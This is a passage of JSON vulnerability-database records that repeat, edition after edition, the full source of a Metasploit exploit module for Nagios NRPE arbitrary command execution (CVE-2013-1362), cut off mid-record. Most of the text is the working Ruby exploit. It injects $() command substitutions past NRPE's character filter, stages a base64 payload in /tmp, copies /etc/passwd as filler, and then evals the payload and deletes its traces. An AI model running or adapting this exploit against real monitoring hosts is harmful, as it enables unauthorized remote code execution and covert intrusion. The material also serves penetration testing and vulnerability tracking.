prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-01-15T08:01:40", "differentElements": ["modified", "published"], "edition": 22}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-01-15T10:05:47", "history": [], "viewCount": 19, "enchantments": {"score": {"value": null, "modified": "2018-01-15T10:05:47"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-01-15T10:05:47", "differentElements": ["modified", "published"], "edition": 23}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-01-18T00:03:52", "history": [], "viewCount": 19, "enchantments": {"score": {"value": null, "modified": "2018-01-18T00:03:52"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-01-18T00:03:52", "differentElements": ["modified", "published"], "edition": 24}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-01-18T02:02:28", "history": [], "viewCount": 58, "enchantments": {"score": {"value": 6.0, "modified": "2018-01-18T02:02:28"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-01-18T02:02:28", "differentElements": ["modified", "published"], "edition": 25}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-01-26T14:07:32", "history": [], "viewCount": 58, "enchantments": {"score": {"value": 6.0, "modified": "2018-01-26T14:07:32"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n 